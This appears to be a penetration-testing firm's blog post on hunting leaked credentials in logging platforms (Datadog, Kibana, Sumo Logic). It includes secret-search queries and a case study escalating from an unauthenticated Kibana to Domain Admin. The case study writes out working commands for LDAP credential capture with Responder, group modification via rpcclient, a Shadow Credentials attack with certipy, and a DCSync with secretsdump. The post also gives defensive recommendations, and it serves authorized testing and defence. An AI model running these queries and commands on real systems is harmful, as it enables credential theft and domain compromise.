In penetration testing and red teaming, success often lies in uncovering hidden paths of least resistance. While sophisticated exploits and zero-days frequently capture headlines, highly effective attack opportunities often hide in plain sight – like within internal logging and monitoring platforms.
At Praetorian, we’ve observed first-hand the value of targeting internal logging and monitoring platforms during our engagements. Not due to vulnerabilities in the platforms themselves, but because systems like Datadog, Kibana, and Sumo Logic frequently contain credentials, API keys, and other sensitive information inadvertently logged by users. These exposed secrets can be leveraged by penetration testers and red teams to significantly accelerate their progress toward objectives while maintaining a low detection profile. This tactic has proven lucrative, delivering significant impact on recent internal network assessments and red team operations, consistently yielding high-impact results with minimal detection risk precisely because we’re using legitimate functionality and accessing information that shouldn’t have been logged in the first place.
In this post, we’ll explore why internal logging and monitoring platforms represent prime targets, discuss effective techniques for identifying sensitive data within them, and demonstrate how our team has leveraged these platforms to achieve comprehensive domain compromise.
Why Target Logging and Monitoring Platforms?
Modern organizations have embraced centralized logging and monitoring solutions for improved visibility, troubleshooting, and security insights. However, this centralization creates an attractive target for several reasons:
- Credential Exposure: Developers frequently log sensitive information during troubleshooting, including API keys, access tokens, and plaintext credentials.
- OPSEC Advantages: Querying logging platforms resembles legitimate user activity and rarely triggers security alerts, unlike traditional scanning tools or exploitation techniques.
- Extensive Access: These platforms typically have visibility across the entire infrastructure, from development environments to production systems, which often includes valuable information about organizational structure and technology.
- Historical Data: You can discover credentials and information that might not be actively used but remain valid, sometimes dating back months or years.
- Legitimate Tools: Using the client’s own systems removes the need to introduce potentially flagged software into the environment.
Common Platforms and Their Value
There are an endless number of internal logging and monitoring platforms. While these platforms themselves aren’t inherently vulnerable, the way organizations configure and use them often creates security risks. As a general rule, when we encounter a logging and monitoring platform these are common things we look for to identify sensitive information:
- Authentication events and failures (often contain attempted credentials)
- Error logs containing connection strings or credentials
- API interactions with authorization headers and tokens
- Deployment and CI/CD pipeline logs with environment variables and build credentials
- Container startup logs with secrets
- Configuration changes exposing credentials
- Dashboard configurations with hardcoded secrets
- Custom metrics with embedded API keys
- Technology stacks deployed in the environment
- Internal organization processes
If you’re interested in specific details, below are a few platforms we’ve encountered recently along with some search patterns that have successfully yielded credentials.
Datadog
Datadog is a unified monitoring platform that combines metrics, traces, and logs. Its comprehensive logging capabilities make it particularly valuable for hunting secrets.
Effective search patterns:
Note: Search patterns in this post are meant as an example showing the search format. Expand with your own queries based on the context of the environment and the information you intend to find.
"password" OR "credential" OR "secret"
"api_key" OR "apikey" OR "api-key"
"access_key" OR "accesskey" OR "access-key"
"token" OR "auth_token" OR "authorization:"
"connection string" OR "connectionstring"
Kibana/Elasticsearch
Kibana provides a visualization layer for Elasticsearch data, often serving as an organization’s central logging repository.
Effective search patterns (Kibana Query Language):
message:password OR message:credential OR message:secret
message:*api_key* OR message:*apikey* OR message:*api-key*
message:*token* AND NOT (message:*validate* OR message:*invalid*)
message:*AKIA* OR tags:aws_access_key
Sumo Logic
Sumo Logic is a cloud-based log management and analytics service that provides real-time insights from machine-generated data. Its powerful search capabilities make it an excellent tool for security investigations and secret hunting.
Effective search patterns:
_sourceCategory=*production* AND (*password* OR *credential* OR *secret*)
_sourceCategory=*api* AND (*api_key* OR *apikey* OR *token* OR *bearer*)
_sourceCategory=*deploy* AND (*access_key* OR *accesskey* OR *key*)
_source=*aws* AND *AKIA*
error AND (*connection* OR *connect* OR *string* OR *jdbc*)
Search syntax tips:
- Use _sourceCategory, _source, and _sourceHost to narrow down log sources
- Boolean operators: AND, OR, NOT for complex queries
- Wildcards: * for matching any character sequence
- Field extraction: | parse “key=*” as secret_key to extract specific values
- Consider the context of the systems the client has in their environment
- Would an exposed JWT gain you additional access that could be valuable?
- Does the client have a CI/CD pipeline?
- Look for error messages that may inadvertently expose sensitive data
Case Study: From Unauthenticated Kibana to Domain Admin
The following case study from a recent Praetorian engagement demonstrates the effectiveness of this approach, showing how monitoring platforms can serve as an initial access vector for a sophisticated attack chain.
First things first, let’s take a look at our attack path:
Initial Discovery: Unauthenticated Kibana
During an internal network assessment, our team discovered an unauthenticated Kibana instance accessible on the client’s internal network. This misconfiguration provided immediate access to a wealth of logs without requiring any credentials, and we immediately recognized the opportunity it presented.
Extracting GitHub Credentials
We methodically searched through the accessible logs, using targeted queries to locate authentication information:
message:*github* AND message:*ghp_*
This query revealed logs from a CI/CD pipeline containing a GitHub Personal Access Token (PAT) with elevated repository access. The token had been inadvertently captured in the logs when a developer was troubleshooting a failed deployment.
{
"status": {"loadbalancerstatus", "operationshealthcheck", "serviceinfo": },
"GITHUB_TOKEN": "ghp_a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9",
"GITHUB_OWNER": "exampleorg",
}
GitHub Repository Enumeration
With the GitHub PAT in hand, we gained access to the organization’s private repositories. Using our open-source secrets scanning tool Nosey Parker, we scanned these repositories for additional credentials:
noseyparker scan –github-organization $ORG_NAME
Among various secrets discovered, we identified administrator credentials for a DevOps platform deployed in the client’s environment. The credentials were stored in plaintext within a deployment configuration file.
class ServerManager:
def __init__(self, name, url):
self.app = App(outdir=name)
self.stack = ServerResource(self.app, name)
ResourceProvider(
self.stack, name,
url=url,
username='devops_admin',
password='S3cureP@ssw0rd123!'
)
user_groups(self.stack)
def get_instance(self):
return (self.app, self.stack)
prod = ServerManager('prod_server', 'http://example.com').get_instance()
back = ServerManager('back_server', 'http://10.10.10.10:9999/devops').get_instance()
DevOps LDAP Integration
Using the discovered admin credentials, we authenticated to the DevOps platform admin console. Examining the client’s system configuration, we identified that the platform was integrated with Active Directory using standard LDAP authentication. The LDAP configuration revealed:
- Connection details to domain controllers
- Service account name being used for LDAP queries (devops_prod)
- Authentication method (cleartext)
Most importantly, we identified that platform administrators could modify the LDAP server settings and trigger a connection test, forcing the service to authenticate using its service account credentials to our chosen server.
LDAP Authentication Coercion
At this point, we set up our attack infrastructure to capture the LDAP authentication:
sudo responder -I $INTERFACE
After modifying the DevOps platform’s LDAP configuration to point to our attacker machine and clicking “Test Connection”, we successfully captured the cleartext password for the devops_prod account.
Service Account Privilege Escalation
Authentication as devops_prod gave us access to perform BloodHound analysis of the Active Directory environment. This analysis revealed that the compromised service account had the following permissions:
- GenericAll permissions over the Enterprise Key Admins group
- Members of the Enterprise Key Admins group were granted the AddKeyCredentialLink permission over a domain controller.
- The domain controller has DCSYnc for the domain
This level of access gives us a clear path to Domain Admin and allows us to:
- Add our compromised user to the Enterprise Key Admins group
- Leverage the AddKeyCredentialLink permission to perform a Shadow Credentials attack against the domain controller and compromise its machine account
- Utilize the compromised domain controller’s machine account to execute a DCSync to extract any credentials in the domain.
Making Ourselves an Administrator
We first leveraged the GenericAll permission to add the service account (devops_prod) to the Enterprise Key Admins group:
rpcclient -U "domain.local\devops_prod%PASS_HERE" $DC_HERE -c addmem \"Enterprise Key Admins\" "devops_prod"
Shadow Credentials
With our controlled account now a member of Enterprise Key Admins, we were positioned to perform the Shadow Credentials attack against a domain controller:
certipy shadow auto -u devops_prod@domain.local -p 'PASS_HERE' -account DC_ACCOUNT$
This granted us the NT hash for the domain controller’s computer account.
DCSync and Domain Admin Access
With domain controller computer account privileges, we executed a DCSync attack to extract credentials for a Domain Admin account of our choice:
secretsdump -just-dc-user SUPER_ADMIN -hashes :"$NT_HASH" "domain.local"/"DC_MACHINE_ACCOUNT$"@"$DC_IP"
Takeaway
The entire attack chain was executed without deploying malware or exploiting traditional vulnerabilities. Instead, we leveraged legitimate access paths established through credential discoveries, beginning with an improperly secured monitoring platform—a single instance of an accidentally exposed GitHub credential in Kibana logs initiated a cascading series of privilege escalations. This case highlights how modern enterprise environments can be compromised through “living off the land” techniques and why strong credential management and monitoring platform security must be prioritized in defense strategies.
Hunting Strategy Recommendations
Based on our experience, we recommend the following strategies:
- Start with Recent Data: Begin by searching the last 7 days of logs, then expand if needed.
- Focus on High-Value Targets: Prioritize logs from authentication systems, CI/CD pipelines, and deployment tools.
- Look for Errors: Failed operations and error messages often contain the richest information.
- Use Context: Include application or service names in your searches to reduce false positives.
- Chain Discoveries: Use each credential you find to access new systems and hunt for more information.
Detection and Prevention Recommendations
For defenders looking to mitigate these risks, we recommend:
- Log Scrubbing: Implement log scrubbing to prevent sensitive information from being stored in logging platforms.
- Access Control: Apply strict access controls to logging and monitoring platforms. These platforms should never be exposed to unauthenticated users.
- Secret Scanning: Use automated tools to detect secrets in logs and alert when they’re found.
- Credential Rotation: Regularly rotate credentials, especially service account passwords and API keys.
- Query Monitoring: Implement alerting for suspicious search patterns in logging platforms.
Weaponizing Transparency
Our recent engagements at Praetorian have repeatedly demonstrated that internal logging and monitoring platforms represent extremely valuable and often underutilized information sources during penetration tests and red team assessments. By understanding how to effectively search these platforms, security teams can discover credentials and sensitive information that dramatically accelerate the path to objective completion—all while maintaining a low profile.
This approach has been particularly effective over the past year, as organizations improve their security posture against traditional attack vectors while overlooking these logging platforms as potential sources of sensitive information. As defenders strengthen these conventional defenses, attackers adapt by finding the path of least resistance—and increasingly, that path runs through the very systems designed to provide visibility and security. The next time you’re on an assessment, don’t immediately reach for scanning and exploitation tools. Instead, explore what the target is already logging about itself.